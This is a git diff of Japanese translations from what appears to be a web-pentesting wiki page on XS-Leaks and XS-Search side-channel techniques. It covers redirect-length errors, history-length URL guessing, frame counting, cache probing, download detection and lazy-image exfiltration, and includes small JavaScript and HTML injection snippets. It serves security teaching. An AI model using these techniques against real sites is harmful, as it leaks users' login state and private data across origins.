+攻撃者は、クロスオリジンHTTP応答におけるクロスオリジンオープナーポリシー(COOP)ヘッダーの存在を推測することができます。COOPは、外部サイトが任意のウィンドウ参照を取得するのを妨げるためにウェブアプリケーションによって使用されます。このヘッダーの可視性は、**`contentWindow`参照にアクセスしようとすることによって識別できます**。COOPが条件付きで適用されるシナリオでは、**`opener`プロパティ**が明白な指標となります：COOPが有効な場合は**未定義**であり、無効な場合は**定義されます**。
 
 ### URL最大長 - サーバーサイド
 
 - **インクルージョンメソッド**: Fetch API、HTML要素
 - **検出可能な違い**: ステータスコード / コンテンツ
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
-- **概要:** リダイレクト応答の長さの違いを検出します。サーバーがエラーで再生する可能性があるため、アラートが生成されます。
+- **要約:** リダイレクト応答の長さが大きすぎるため、サーバーがエラーで再生し、アラートが生成されるため、応答の違いを検出します。
 - **コード例**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
 
-サーバーサイドリダイレクトが**リダイレクト内でユーザー入力を使用し**、**追加データ**を持つ場合、この動作を検出することが可能です。通常、**サーバー**には**リクエスト長の制限**があります。もし**ユーザーデータ**がその**長さ - 1**であれば、**リダイレクト**が**そのデータを使用し**、**何か**を**追加**しているため、**エラーがトリガーされ、エラーイベントを介して検出可能**です。
-
-ユーザーにクッキーを設定できる場合、**十分なクッキーを設定することによって**この攻撃を実行することもできます（[**クッキーボム**](hacking-with-cookies/cookie-bomb.md)）。そのため、**正しい応答のサイズが増加し**、**エラー**がトリガーされます。この場合、同じサイトからこのリクエストをトリガーすると、`<script>`が自動的にクッキーを送信するため（エラーを確認できます）。\
+サーバーサイドリダイレクトが**リダイレクション内でユーザー入力を使用し**、**追加データ**を持つ場合、この動作を検出することが可能です。通常、**サーバー**には**リクエスト長の制限**があります。もし**ユーザーデータ**がその**長さ - 1**であれば、**リダイレクト**が**そのデータ**を使用し、**何か追加**しているため、**エラーがトリガーされます**（エラーは、リダイレクトが**そのデータ**を使用しているために発生します）。\
+もし何らかの方法でユーザーにクッキーを設定できる場合、**十分なクッキーを設定することによって**この攻撃を実行することもできます（[**クッキーボム**](hacking-with-cookies/cookie-bomb.md)）。そのため、**正しい応答のサイズが増加し**、**エラー**がトリガーされます。この場合、同じサイトからこのリクエストをトリガーすると、`<script>`は自動的にクッキーを送信します（したがって、エラーを確認できます）。\
 **クッキーボム + XS-Search**の例は、この書き込みの意図された解決策に見つけることができます: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
 
 `SameSite=None`または同じコンテキストにいることが、この種の攻撃には通常必要です。
@@ -598,16 +597,16 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 - **インクルージョンメソッド**: ポップアップ
 - **検出可能な違い**: ステータスコード / コンテンツ
 - **詳細情報**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
-- **概要:** リダイレクト応答の長さの違いを検出します。リクエストが大きすぎるため、違いが認識される可能性があります。
+- **要約:** リダイレクト応答の長さが大きすぎるため、リクエストに違いがあることを検出します。
 - **コード例**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
 
 [Chromiumのドキュメント](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length)によると、Chromeの最大URL長は2MBです。
 
 > 一般的に、_ウェブプラットフォーム_にはURLの長さに制限はありません（ただし、2^31は一般的な制限です）。_Chrome_は、実用的な理由とプロセス間通信におけるサービス拒否問題を回避するために、URLを最大**2MB**に制限しています。
 
-したがって、**リダイレクトURLが一方のケースで大きい場合**、**2MBを超えるURLでリダイレクトさせる**ことが可能です。これが発生すると、Chromeは**`about:blank#blocked`**ページを表示します。
+したがって、**リダイレクトURLの応答が一方のケースで大きい場合**、**2MBより大きいURLでリダイレクト**させることが可能です。これが発生すると、Chromeは**`about:blank#blocked`**ページを表示します。
 
-**顕著な違い**は、**リダイレクト**が**完了**した場合、`window.origin`が**エラー**をスローすることです。クロスオリジンはその情報にアクセスできません。しかし、**制限**が\*\*\*\*に達し、読み込まれたページが**`about:blank#blocked`**である場合、ウィンドウの**`origin`**は**親**のものであり、これは**アクセス可能な情報**です。
+**顕著な違い**は、**リダイレクト**が**完了**した場合、`window.origin`が**エラー**をスローすることです。なぜなら、クロスオリジンはその情報にアクセスできないからです。しかし、**制限**が\*\*\*\*に達し、読み込まれたページが**`about:blank#blocked`**であった場合、ウィンドウの**`origin`**は**親**のものであり、これは**アクセス可能な情報**です。
 
 **2MB**に達するために必要なすべての追加情報は、最初のURLに**ハッシュ**を追加することで追加でき、リダイレクトで**使用されます**。
 
@@ -620,30 +619,30 @@ xs-search/url-max-length-client-side.md
 - **インクルージョンメソッド**: Fetch API、フレーム
 - **検出可能な違い**: ステータスコード
 - **詳細情報**: [https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76)
-- **概要:** ブラウザのリダイレクト制限を使用して、URLリダイレクトの発生を確認します。
+- **要約:** ブラウザのリダイレクト制限を使用して、URLリダイレクションの発生を確認します。
 - **コード例**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
 
-ブラウザの**最大**リダイレクト数が**20**の場合、攻撃者は**19のリダイレクト**でページを読み込もうとし、最終的に**被害者を**テストされたページに送信することができます。**エラー**がトリガーされる場合、ページは**被害者をリダイレクトしようとしていた**ことになります。
+ブラウザの**最大**リダイレクト数が**20**の場合、攻撃者は**19のリダイレクト**でページを読み込もうとし、最終的に**被害者**をテストされたページに送信することができます。**エラー**がトリガーされる場合、そのページは**被害者をリダイレクトしようとしていた**ことになります。
 
 ### 履歴の長さ
 
 - **インクルージョンメソッド**: フレーム、ポップアップ
 - **検出可能な違い**: リダイレクト
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
-- **概要:** JavaScriptコードがブラウザの履歴を操作し、長さプロパティでアクセスできます。
+- **要約:** JavaScriptコードはブラウザの履歴を操作し、長さプロパティでアクセスできます。
 - **コード例**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
 
 **History API**は、JavaScriptコードがブラウザの履歴を操作できるようにし、**ユーザーが訪れたページを保存します**。攻撃者は、長さプロパティをインクルージョンメソッドとして使用できます：JavaScriptとHTMLのナビゲーションを検出するために。\
-**`history.length`**を確認し、ユーザーに**ページに移動**させ、**同じオリジンに戻す**ことで、**`history.length`**の新しい値を**確認します**。
+**`history.length`**を確認し、ユーザーを**ページにナビゲート**させ、**同じオリジンに戻す**ことで、**`history.length`**の新しい値を確認します。
 
 ### 同じURLでの履歴の長さ
 
 - **インクルージョンメソッド**: フレーム、ポップアップ
 - **検出可能な違い**: URLが推測したものと同じかどうか
-- **概要:** 特定のURLにフレーム/ポップアップの位置があるかどうかを推測することができます。
+- **要約:** 履歴の長さを悪用して、フレーム/ポップアップの位置が特定のURLにあるかどうかを推測できます。
 - **コード例**: 以下
 
-攻撃者はJavaScriptコードを使用して**フレーム/ポップアップの位置を推測したものに操作し**、**すぐに**それを**`about:blank`**に**変更**することができます。履歴の長さが増加した場合、それはURLが正しかったことを意味し、**同じであれば再読み込みされないため**、増加する時間がありました。増加しなかった場合、それは**推測したURLを読み込もうとした**が、**すぐに**`about:blank`を読み込んだため、**推測したURLを読み込む際に履歴の長さは増加しなかった**ことを意味します。
+攻撃者はJavaScriptコードを使用して、**フレーム/ポップアップの位置を推測したものに操作し**、**すぐに**それを**`about:blank`**に変更することができます。履歴の長さが増加した場合、それはURLが正しかったことを意味し、**同じであればURLは再読み込みされないため**、増加する時間がありました。増加しなかった場合、それは**推測したURLを読み込もうとした**が、**すぐに**`about:blank`を読み込んだため、**履歴の長さは増加しなかった**ことを意味します。
 ```javascript
 async function debug(win, url) {
 win.location = url + "#aaa"
@@ -666,13 +665,13 @@ console.log(await debug(win, "https://example.com/?a=b"))
 - **インクルージョンメソッド**: フレーム、ポップアップ
 - **検出可能な違い**: ページコンテンツ
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
-- **概要**: `window.length` プロパティを調べて iframe 要素の数を評価します。
+- **概要**: `window.length` プロパティを調査して iframe 要素の数を評価します。
 - **コード例**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)
 
 `iframe` または `window.open` を介して開かれた **ウェブのフレームの数**をカウントすることで、**そのページ上のユーザーの状態**を特定するのに役立つかもしれません。\
 さらに、ページが常に同じ数のフレームを持っている場合、フレームの数を**継続的に**チェックすることで、情報が漏洩する可能性のある**パターン**を特定するのに役立つかもしれません。
 
-この技術の例として、Chrome では、**PDF** が **フレームカウント** によって **検出** されることがあります。なぜなら、内部で `embed` が使用されているからです。`zoom`、`view`、`page`、`toolbar` などのコンテンツに対する制御を許可する [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) があり、この技術が興味深い場合があります。
+この技術の例として、Chromeでは、**PDF**が**フレームカウント**で**検出**されることがあります。なぜなら、内部で `embed` が使用されているからです。`zoom`、`view`、`page`、`toolbar` などのコンテンツに対する制御を許可する [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) があり、この技術が興味深い場合があります。
 
 ### HTMLElements
 
@@ -684,10 +683,10 @@ console.log(await debug(win, "https://example.com/?a=b"))
 
 HTML要素を通じた情報漏洩は、特にユーザー情報に基づいて動的メディアファイルが生成される場合や、メディアサイズを変更する透かしが追加される場合に、ウェブセキュリティの懸念事項です。攻撃者は、特定のHTML要素によって露出された情報を分析することで、可能な状態を区別するためにこれを悪用することができます。
 
-### HTML要素によって露出された情報
+### HTML要素によって露出される情報
 
 - **HTMLMediaElement**: この要素はメディアの `duration` と `buffered` 時間を明らかにし、APIを介してアクセスできます。[HTMLMediaElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
-- **HTMLVideoElement**: `videoHeight` と `videoWidth` を露出します。一部のブラウザでは、`webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount`、および `webkitDecodedFrameCount` などの追加プロパティが利用可能で、メディアコンテンツに関するより詳細な情報を提供します。[HTMLVideoElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
+- **HTMLVideoElement**: `videoHeight` と `videoWidth` を公開します。一部のブラウザでは、`webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount`、および `webkitDecodedFrameCount` などの追加プロパティが利用可能で、メディアコンテンツに関するより詳細な情報を提供します。[HTMLVideoElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
 - **getVideoPlaybackQuality()**: この関数は、`totalVideoFrames` を含むビデオ再生品質に関する詳細を提供し、処理されたビデオデータの量を示すことができます。[getVideoPlaybackQuality()についての詳細](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
 - **HTMLImageElement**: この要素は画像の `height` と `width` を漏洩します。ただし、画像が無効な場合、これらのプロパティは0を返し、`image.decode()` 関数は拒否され、画像が正しく読み込まれなかったことを示します。[HTMLImageElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
 
@@ -699,7 +698,7 @@ HTML要素を通じた情報漏洩は、特にユーザー情報に基づいて
 - **概要**: ユーザーの状態やステータスに関連するウェブサイトのスタイリングの変化を特定します。
 - **コード例**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
 
-ウェブアプリケーションは、ユーザーの状態に応じて**ウェブサイトのスタイリングを変更する**ことがあります。攻撃者のページに**HTMLリンク要素**を使用してクロスオリジンCSSファイルを埋め込むことができ、**ルール**は攻撃者のページに**適用されます**。ページがこれらのルールを動的に変更する場合、攻撃者はユーザーの状態に応じてこれらの**違い**を**検出**できます。\
+ウェブアプリケーションは、ユーザーの状態に応じて**ウェブサイトのスタイリングを変更する**ことがあります。クロスオリジンのCSSファイルは、**HTMLリンク要素**を使用して攻撃者のページに埋め込むことができ、**ルール**は攻撃者のページに**適用されます**。ページがこれらのルールを動的に変更する場合、攻撃者はユーザーの状態に応じてこれらの**違い**を**検出**できます。\
 漏洩技術として、攻撃者は `window.getComputedStyle` メソッドを使用して特定のHTML要素の**CSS**プロパティを**読み取る**ことができます。その結果、影響を受ける要素とプロパティ名が知られている場合、攻撃者は任意のCSSプロパティを読み取ることができます。
 
 ### CSS履歴
@@ -707,17 +706,17 @@ HTML要素を通じた情報漏洩は、特にユーザー情報に基づいて
 - **インクルージョンメソッド**: HTML要素
 - **検出可能な違い**: ページコンテンツ
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
-- **概要**: `:visited` スタイルが適用されているかどうかを検出し、URLがすでに訪問されたことを示します。
+- **概要**: `:visited` スタイルがURLに適用されているかどうかを検出し、すでに訪問されたことを示します。
 - **コード例**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
 
 > [!NOTE]
-> [**これに基づいて**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)、これはヘッドレスChromeでは機能しません。
+> [**これ**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)によると、これはヘッドレスChromeでは機能しません。
 
-CSS `:visited` セレクタは、ユーザーが以前に訪問した場合にURLを異なるスタイルで装飾するために使用されます。過去には、`getComputedStyle()` メソッドを使用してこれらのスタイルの違いを特定することができました。しかし、現代のブラウザは、このメソッドがリンクの状態を明らかにするのを防ぐためのセキュリティ対策を実施しています。これらの対策には、リンクが訪問されたかのように常に計算されたスタイルを返し、`:visited` セレクタで適用できるスタイルを制限することが含まれます。
+CSSの `:visited` セレクタは、ユーザーが以前に訪問した場合にURLを異なるスタイルで装飾するために使用されます。過去には、`getComputedStyle()` メソッドを使用してこれらのスタイルの違いを特定することができました。しかし、現代のブラウザは、このメソッドがリンクの状態を明らかにするのを防ぐためのセキュリティ対策を実施しています。これらの対策には、リンクが訪問されたかのように常に計算されたスタイルを返し、`:visited` セレクタで適用できるスタイルを制限することが含まれます。
 
 これらの制限にもかかわらず、リンクの訪問状態を間接的に見分けることは可能です。1つの技術は、ユーザーをCSSに影響を与える領域に対話させることを含み、特に `mix-blend-mode` プロパティを利用します。このプロパティは、要素とその背景をブレンドすることを可能にし、ユーザーの対話に基づいて訪問状態を明らかにする可能性があります。
 
-さらに、リンクのレンダリングタイミングを悪用することで、ユーザーの対話なしに検出を行うことができます。ブラウザは訪問済みリンクと未訪問リンクを異なる方法でレンダリングする可能性があるため、これによりレンダリングの時間差が生じることがあります。概念実証（PoC）は、Chromiumのバグレポートで言及されており、複数のリンクを使用してタイミングの違いを増幅させ、訪問状態をタイミング分析を通じて検出可能にするこの技術を示しています。
+さらに、リンクのレンダリングタイミングを悪用することで、ユーザーの対話なしに検出を行うことができます。ブラウザは、訪問済みリンクと未訪問リンクを異なる方法でレンダリングする可能性があるため、レンダリングにおける測定可能な時間の違いを生じさせることがあります。概念実証（PoC）は、Chromiumのバグレポートで言及されており、複数のリンクを使用してタイミングの違いを増幅させ、タイミング分析を通じて訪問状態を検出可能にするこの技術を示しています。
 
 これらのプロパティとメソッドの詳細については、ドキュメントページを訪れてください：
 
@@ -740,20 +739,20 @@ Chromeでは、`X-Frame-Options` ヘッダーが "deny" または "same-origin"
 - **インクルージョンメソッド**: フレーム、ポップアップ
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
-- **概要**: 攻撃者は、iframeを利用してファイルのダウンロードを識別できます。iframeの継続的なアクセス可能性は、ファイルのダウンロードが成功したことを示唆します。
+- **概要**: 攻撃者は、iframeを利用してファイルのダウンロードを識別できます。iframeの継続的なアクセスは、ファイルのダウンロードが成功したことを示唆します。
 - **コード例**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
 
 `Content-Disposition` ヘッダー、特に `Content-Disposition: attachment` は、ブラウザにコンテンツをインラインで表示するのではなく、ダウンロードするよう指示します。この動作は、ユーザーがファイルダウンロードをトリガーするページにアクセスできるかどうかを検出するために悪用できます。Chromiumベースのブラウザでは、このダウンロード動作を検出するためのいくつかの技術があります：
 
 1. **ダウンロードバーの監視**:
 - Chromiumベースのブラウザでファイルがダウンロードされると、ブラウザウィンドウの下部にダウンロードバーが表示されます。
-- ウィンドウの高さの変化を監視することで、攻撃者はダウンロードバーの出現を推測し、ダウンロードが開始されたことを示唆できます。
+- ウィンドウの高さの変化を監視することで、ダウンロードバーの出現を推測し、ダウンロードが開始されたことを示唆できます。
 2. **iframeを使用したダウンロードナビゲーション**:
 - ページが `Content-Disposition: attachment` ヘッダーを使用してファイルダウンロードをトリガーすると、ナビゲーションイベントは発生しません。
 - コンテンツをiframeに読み込み、ナビゲーションイベントを監視することで、コンテンツの配置がファイルダウンロードを引き起こすかどうか（ナビゲーションなし）を確認できます。
 3. **iframeなしのダウンロードナビゲーション**:
 - iframe技術と同様に、この方法はiframeの代わりに `window.open` を使用します。
-- 新しく開かれたウィンドウでナビゲーションイベントを監視することで、ファイルダウンロードがトリガーされたかどうか（ナビゲーションなし）や、コンテンツがインラインで表示されているか（ナビゲーションが発生）を明らかにできます。
+- 新しく開かれたウィンドウでナビゲーションイベントを監視することで、ファイルダウンロードがトリガーされたかどうか（ナビゲーションなし）を明らかにすることができます。
 
 ログインユーザーのみがそのようなダウンロードをトリガーできるシナリオでは、これらの技術を使用して、ダウンロードリクエストに対するブラウザの応答に基づいてユーザーの認証状態を間接的に推測することができます。
 
@@ -762,24 +761,24 @@ Chromeでは、`X-Frame-Options` ヘッダーが "deny" または "same-origin"
 - **インクルージョンメソッド**: ポップアップ
 - **検出可能な違い**: タイミング
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
-- **概要**: 攻撃者は、iframeを利用してファイルのダウンロードを識別できます。iframeの継続的なアクセス可能性は、ファイルのダウンロードが成功したことを示唆します。
+- **概要**: 攻撃者は、iframeを利用してファイルのダウンロードを識別できます。iframeの継続的なアクセスは、ファイルのダウンロードが成功したことを示唆します。
 - **コード例**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (from [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
 
 > [!WARNING]
 > この技術が興味深い理由は、Chromeが現在**キャッシュパーティショニング**を持っており、新しく開かれたページのキャッシュキーは `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m=xxx)` ですが、ngrokページを開いてfetchを使用すると、キャッシュキーは `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)` になります。**キャッシュキーが異なる**ため、キャッシュは共有できません。詳細はここで確認できます: [キャッシュのパーティショニングによるセキュリティとプライバシーの向上](https://developer.chrome.com/blog/http-cache-partitioning/)\
-> （[**こちらからのコメント**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)）
+> （[**ここ**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)からのコメント）
 
-サイト `example.com` が `*.example.com/resource` からリソースを含む場合、そのリソースは**トップレベルナビゲーションを介して直接リクエストされた場合と同じキャッシングキー**を持ちます。これは、キャッシングキーがトップレベル _eTLD+1_ とフレーム _eTLD+1_ で構成されているためです。
+サイト `example.com` が `*.example.com/resource` からリソースを含む場合、そのリソースは、リソースがトップレベルナビゲーションを介して直接要求された場合と**同じキャッシングキー**を持ちます。これは、キャッシングキーがトップレベル _eTLD+1_ とフレーム _eTLD+1_ で構成されているためです。
 
-キャッシュにアクセスする方がリソースを読み込むよりも速いため、ページの位置を変更し、20ms（例えば）後にキャンセルすることを試みることができます。停止後にオリジンが変更された場合、それはリソースがキャッシュされていたことを意味します。\
-または、**潜在的にキャッシュされたページにfetchを送信し、かかる時間を測定することもできます**。
+キャッシュにアクセスする方がリソースを読み込むよりも速いため、ページの位置を変更し、20ms（例えば）後にそれをキャンセルすることを試みることができます。停止後にオリジンが変更された場合、それはリソースがキャッシュされていたことを意味します。\
+または、**潜在的にキャッシュされたページにいくつかのfetchを送信し、かかる時間を測定することもできます**。
 
 ### 手動リダイレクト <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
 
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: リダイレクト
 - **詳細情報**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234)
-- **概要**: fetchリクエストの応答がリダイレクトであるかどうかを確認できます。
+- **概要**: fetchリクエストへの応答がリダイレクトであるかどうかを確認できます。
 - **コード例**:
 
 ![](<../images/image (652).png>)
@@ -789,17 +788,17 @@ Chromeでは、`X-Frame-Options` ヘッダーが "deny" または "same-origin"
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: タイミング
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-- **概要**: リソースを読み込もうとし、読み込まれる前に中断します。エラーが発生するかどうかに応じて、リソースがキャッシュされているかどうかがわかります。
+- **概要**: リソースを読み込もうとし、読み込まれる前に中断します。エラーがトリガーされるかどうかに応じて、リソースがキャッシュされているかどうかがわかります。
 - **コード例**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
-_**fetch**_ と _**setTimeout**_ を使用して **AbortController** で **リソースがキャッシュされているかどうかを検出**し、特定のリソースをブラウザキャッシュから排除します。さらに、このプロセスは新しいコンテンツをキャッシュすることなく行われます。
+_**fetch**_ と _**setTimeout**_ を使用して **AbortController** で、**リソースがキャッシュされているかどうかを検出**し、特定のリソースをブラウザキャッシュから排除します。さらに、このプロセスは新しいコンテンツをキャッシュせずに行われます。
 
 ### スクリプト汚染
 
 - **インクルージョンメソッド**: HTML要素（スクリプト）
 - **検出可能な違い**: ページコンテンツ
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
-- **概要**: **組み込み関数を上書き**し、その引数を読み取ることが可能で、**クロスオリジンのスクリプト**からも（直接読み取ることはできません）、これが**貴重な情報を漏洩する可能性があります**。
+- **概要**: **組み込み関数を上書き**し、その引数を読み取ることが可能で、**クロスオリジンのスクリプト**からも（直接読み取ることはできません）、これが**貴重な情報を漏洩する**可能性があります。
 - **コード例**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
 
 ### サービスワーカー <a href="#service-workers" id="service-workers"></a>
@@ -810,12 +809,12 @@ _**fetch**_ と _**setTimeout**_ を使用して **AbortController** で **リ
 - **概要**: サービスワーカーを使用してウェブの実行時間を測定します。
 - **コード例**:
 
-与えられたシナリオでは、攻撃者は自分のドメインの1つ、具体的には "attacker.com" に **サービスワーカー** を登録することから始めます。次に、攻撃者はメインドキュメントからターゲットウェブサイトに新しいウィンドウを開き、**サービスワーカー** にタイマーを開始するよう指示します。新しいウィンドウが読み込まれ始めると、攻撃者は前のステップで取得した参照を**サービスワーカー**によって管理されているページにナビゲートします。
+与えられたシナリオでは、攻撃者は自分のドメインの1つ、具体的には "attacker.com" 内で **サービスワーカー** を登録することから始めます。次に、攻撃者はメインドキュメントからターゲットウェブサイトに新しいウィンドウを開き、**サービスワーカー** にタイマーを開始するよう指示します。新しいウィンドウが読み込みを開始すると、攻撃者は前のステップで取得した参照を**サービスワーカー**によって管理されているページにナビゲートします。
 
 前のステップで開始されたリクエストが到着すると、**サービスワーカー** は **204 (No Content)** ステータスコードで応答し、ナビゲーションプロセスを効果的に終了します。この時点で、**サービスワーカー** は前のステップで開始されたタイマーからの測定値をキャプチャします。この測定値は、ナビゲーションプロセスの遅延を引き起こすJavaScriptの持続時間によって影響を受けます。
 
 > [!WARNING]
-> 実行タイミングでは、**ネットワーク要因を排除**して**より正確な測定値を取得**することが可能です。たとえば、ページを読み込む前にページで使用されるリソースを読み込むことによってです。
+> 実行タイミングでは、**ネットワーク要因を排除**して**より正確な測定値を取得**することが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによってです。
 
 ### Fetchタイミング
 
@@ -846,20 +845,20 @@ dangling-markup-html-scriptless-injection/
 ### 画像の遅延読み込み
 
 **コンテンツを抽出する**必要があり、**秘密の前にHTMLを追加できる**場合は、**一般的なダンギングマークアップ技術**を確認する必要があります。\
-ただし、何らかの理由で**文字ごとに**行う必要がある場合（キャッシュヒットを介して通信している可能性があります）、このトリックを使用できます。
+ただし、何らかの理由で**文字ごとに**行う必要がある場合（キャッシュヒットを介して通信する場合など）、このトリックを使用できます。
 
 HTMLの**画像**には、値が**lazy**である "**loading**" 属性があります。この場合、画像はページが読み込まれるときではなく、表示されたときに読み込まれます。
 ```html
 <img src=/something loading=lazy >
 ```
-したがって、あなたができることは、**多くのジャンク文字**（例えば**何千もの"W"**）を**秘密の前にウェブページを埋めるために追加することです**、または**`<br><canvas height="1850px"></canvas><br>`のようなものを追加することです**。\
+したがって、あなたができることは、**多くのジャンク文字**（例えば**何千もの"W"**）を**秘密の前にウェブページを埋めるために追加することです**。または、**`<br><canvas height="1850px"></canvas><br>`のようなものを追加します**。\
 例えば、私たちの**インジェクションがフラグの前に現れると**、**画像**は**読み込まれます**が、**フラグの後に現れると**、フラグ + ジャンクが**読み込まれるのを防ぎます**（どれだけのジャンクを置くかは調整が必要です）。これは[**この書き込み**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)で起こったことです。
 
 もう一つのオプションは、**許可されている場合はscroll-to-text-fragmentを使用することです**：
 
 #### Scroll-to-text-fragment
 
-ただし、あなたは**ボットにページにアクセスさせる**必要があります、例えば
+ただし、あなたは**ボットにページにアクセスさせる**必要があります。
 ```
 #:~:text=SECR
 ```
@@ -873,7 +872,7 @@ HTMLの**画像**には、値が**lazy**である "**loading**" 属性があり
 
 ### 画像の遅延読み込み時間ベース
 
-**外部画像を読み込むことができない場合**、攻撃者に画像が読み込まれたことを示す別のオプションは、**文字を何度も推測してそれを測定すること**です。画像が読み込まれると、すべてのリクエストは画像が読み込まれない場合よりも長くかかります。これは、[**この書き込みの解決策**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **において使用されたものです**。ここに要約されています:
+**外部画像を読み込むことができない場合**、攻撃者に画像が読み込まれたことを示す別のオプションは、**文字を何度も推測してそれを測定すること**です。画像が読み込まれると、すべてのリクエストは画像が読み込まれない場合よりも長くかかります。これは、[**この書き込みの解決策**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **において使用されたものです**。
 
 {{#ref}}
 xs-search/event-loop-blocking-+-lazy-images.md
diff --git a/src/pentesting-web/xs-search/README.md b/src/pentesting-web/xs-search/README.md
index ceacc2b06..efc59adb3 100644
--- a/src/pentesting-web/xs-search/README.md
+++ b/src/pentesting-web/xs-search/README.md
@@ -8,29 +8,29 @@ XS-Searchは、**サイドチャネル脆弱性**を利用して**クロスオ
 
 この攻撃に関与する主要なコンポーネントは以下の通りです：
 
-- **脆弱なWeb**: 情報を抽出することを目的としたターゲットウェブサイト。
-- **攻撃者のWeb**: 攻撃者が作成した悪意のあるウェブサイトで、被害者が訪れ、エクスプロイトをホストしています。
-- **インクルージョンメソッド**: 脆弱なWebを攻撃者のWebに組み込むために使用される技術（例：window.open、iframe、fetch、hrefを持つHTMLタグなど）。
-- **リーク技術**: インクルージョンメソッドを通じて収集された情報に基づいて、脆弱なWebの状態の違いを識別するために使用される技術。
-- **状態**: 攻撃者が区別しようとする脆弱なWebの2つの潜在的な条件。
-- **検出可能な違い**: 攻撃者が脆弱なWebの状態を推測するために依存する観察可能な変化。
+- **脆弱なウェブ**: 情報を抽出することを目的としたターゲットウェブサイト。
